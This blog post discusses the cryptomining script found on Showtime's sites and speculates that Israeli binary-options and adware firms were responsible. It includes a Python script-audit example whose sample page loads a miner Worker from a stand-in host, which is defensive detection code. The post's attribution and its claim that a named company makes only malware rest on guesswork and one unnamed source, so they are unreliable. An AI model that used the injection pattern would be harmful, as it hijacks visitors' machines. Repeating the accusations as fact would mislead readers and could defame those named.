Israel, Organized Crime and Cryptocurrency Mining

The websites of US telly giant CBS’s Showtime contained JavaScript that secretly commandeered viewers’ web browsers over the weekend to mine cryptocurrency.
The flagship and its instant-access sibling silently pulled in code that caused browsers to blow spare processor time calculating new Monero coins — a privacy-focused alternative to the ever-popular Bitcoin. The hidden software typically consumed as much as 60 per cent of CPU capacity on computers visiting the sites.
The JavaScript, which appeared on the sites at the start of the weekend and vanished by Monday, sits between HTML comment tags that appear to be an insert from web analytics biz New Relic. It is unlikely that an analytics company would deliberately stash coin-mining scripts onto its customers’ pages, so the code must have come from another source, or was injected by miscreants who had compromised Showtime’s systems.
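The injection pattern described above, an unexpected script riding inside a block that looks like a third-party analytics snippet, is something a site operator can catch by auditing the scripts a served page actually contains rather than trusting the comment markers around them. The Python below is an added example, not code from the original post, from Showtime, or from any company named here; the hostnames, the sample page and the empty inline-script baseline are all constructed.

```python
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of a served page (hypothetical hostnames): the third
# script is an unexpected inline block sitting inside what looks like an
# analytics vendor's comment-delimited snippet.
SAMPLE_HTML = """<html><head>
<script src="https://static.example-cdn.test/app.js"></script>
<!-- Begin analytics vendor snippet -->
<script src="https://js.analytics-vendor.test/agent.js"></script>
<script>
  var w = new Worker("https://miner.example.test/w.js");
</script>
<!-- End analytics vendor snippet -->
</head><body></body></html>
"""

# Script origins the site operator expects to serve (constructed allow-list).
ALLOWED_SCRIPT_HOSTS = {"static.example-cdn.test", "js.analytics-vendor.test"}

# SHA-256 digests of inline scripts approved at deploy time. Left empty here
# so every inline block is reported; a real baseline is generated from the
# page as built, before it is served.
APPROVED_INLINE_SHA256 = set()

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collects every <script> on the page together with the HTML comment that
    most recently preceded it, so a finding can be tied to the snippet it hid in."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None
        self._last_comment = None

    def handle_comment(self, data):
        self._last_comment = data.strip()

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = {"src": dict(attrs).get("src"), "body": "",
                             "after_comment": self._last_comment}

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies raw, possibly in several chunks.
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def inline_digest(body):
    return hashlib.sha256(body.strip().encode("utf-8")).hexdigest()


def audit_scripts(html, allowed_hosts, approved_inline):
    """Return (kind, detail, preceding_comment) tuples for scripts the page
    should not be serving: external scripts from non-allow-listed hosts,
    inline scripts absent from the baseline, and inline scripts that reference
    hosts outside the allow-list (a miner's worker or WebAssembly payload is
    normally fetched from somewhere the site never talked to before)."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for s in parser.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname
            if host not in allowed_hosts:
                findings.append(("external-not-allowlisted", host, s["after_comment"]))
            continue
        digest = inline_digest(s["body"])
        if digest not in approved_inline:
            findings.append(("inline-not-in-baseline", digest, s["after_comment"]))
        for host in URL_RE.findall(s["body"]):
            if host not in allowed_hosts:
                findings.append(("inline-references-host", host, s["after_comment"]))
    return findings


if __name__ == "__main__":
    for kind, detail, ctx in audit_scripts(SAMPLE_HTML, ALLOWED_SCRIPT_HOSTS,
                                           APPROVED_INLINE_SHA256):
        print(f"{kind}: {detail} (after comment: {ctx!r})")
```

Run against the constructed page, this reports the inline block twice: once because its digest is not in the baseline, and once because it pulls a worker from a host the site has no business loading from. Both findings carry the "Begin analytics vendor snippet" comment, which is exactly the context a responder wants when the vendor denies having shipped the code. A strict Content-Security-Policy and Subresource Integrity on external scripts shrink the window for this class of injection, but an audit of the page as actually served is what catches a script added through a compromised publishing or analytics account.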

Who could have done such a thing? I have a pretty good guess.

As detailed by Simona Weinglass’ excellent series of articles in the Times of Israel, for a long time, Israel was a major center of forex and binary option scam companies. Users would see their advertising online, sign up thinking they were going to make money as “traders,” and be cheated out of everything by “brokers”. The entire setup was as rigged as three card monte. The companies were/are earning (stealing) $5–10 billion per year. An entire ecosystem based around providing these companies with services and personnel evolved.

The binary options companies have been able to do this for several reasons:

  1. They were backed by wealthy investors. It is possible that some of these investors are criminals laundering money; it is also possible that they are legitimate businessmen who are simply unscrupulous about the source of their revenues.
  2. They had bought off Israeli politicians. For instance, Likud Member of the Knesset David Bitan, the current Coalition Chairman, has been fighting the recent bills introduced to ban the binary options industry tooth and nail. Why? “A source who remained told The Times of Israel that Bitan told Azaria and other government officials that a family prominently involved in SpotOption are leaders of the Georgian faction of the Likud Central Committee and that he needs their support to maintain his position in the Likud.”
  3. They had access to a deep pool of tech and sales talent. The former was provided by the same pool that feeds Israel’s legitimate high-tech businesses. The technological units of the IDF and Israel’s universities turn out great software engineers. The latter was provided by the endless stream of immigrants from America and Europe, who have poor Hebrew, no connections, find it difficult to make ends meet and maintain a reasonable standard of living in Israel’s expensive economy, and are desperate for work which will allow them to make a decent wage. Job ads for “account managers” at “international financial companies” were ubiquitous in the English-language Israeli press.

All good things, however, must come to an end. As far back as five years ago, the writing was on the wall for the binary/forex industries. In recent years, they’ve been suffering increasing exposure from the media, law enforcement and legislators.

Fortunately, there is another industry for the technical talent and investment money to flow to: malware.

It’s no secret that Israel has had a thriving malware industry for over a decade. Wikipedia says:

Download Valley is a cluster of software companies in Israel, producing and delivering adware to be installed alongside downloads of other software. The primary purpose is to monetize free software and downloads. These software items are commonly browser toolbars, adware, browser hijackers, spyware, and malware. Another group of products are download managers, possibly designed to induce or trick the user to install adware, when downloading a piece of desired software or mobile app from a certain source.

The way it works is like this: you go to a software download site like Softonic or SourceForge and install a free piece of software. That software comes bundled with a piece of malware, often built by these companies, which either changes the content of sites you visit to advertise certain products, or just bombards you with popups. The malware can be very sophisticated, behaving differently depending on the operating system and location of the infected computer, the behavior of the user, or any other quantifiable factor. The advertising space is sold to third-party companies. Since the user technically agreed to install the malware (via the small print or a pre-checked box), the whole thing is not criminally punishable.

Thus, you see companies like IronSource, whose entire business is malware, making money by hurting people. I spoke to a former senior engineer at IronSource recently and asked him whether they produced anything but malware. He quite frankly told me that they do not. And these companies are being treated as Israeli high tech celebrities.

Of course, the key to the whole thing is monetization. It’s one thing to infect people’s computers, and quite another to make money off the process. You can do malwaretising, as described above, but it’s quite difficult: you are competing with legitimate advertising channels, which themselves are increasingly less effective. Adtech is failing, and that means that it’s harder to make money with malwaretising.

So where does that leave us?

If I had to guess, the next logical step is that Israeli malware companies, which are to some degree staffed by intelligent (though unethical) people, are cutting out the middleman. Why try to sell access to infected computers for money when you can use their resources to mine cryptocurrency and make money directly?

The details of the Showtime hack suggest that whoever was setting up the malware was significantly stupider than whoever wrote it. Having the malware steal 60% of the infected computer’s CPU resources practically guarantees getting caught. This suggests that the people using the malware had bought it from the ones who developed it, which in turn suggests that a market emerged some time ago. If anyone with inside knowledge would like to discuss, they can drop me a line at my email,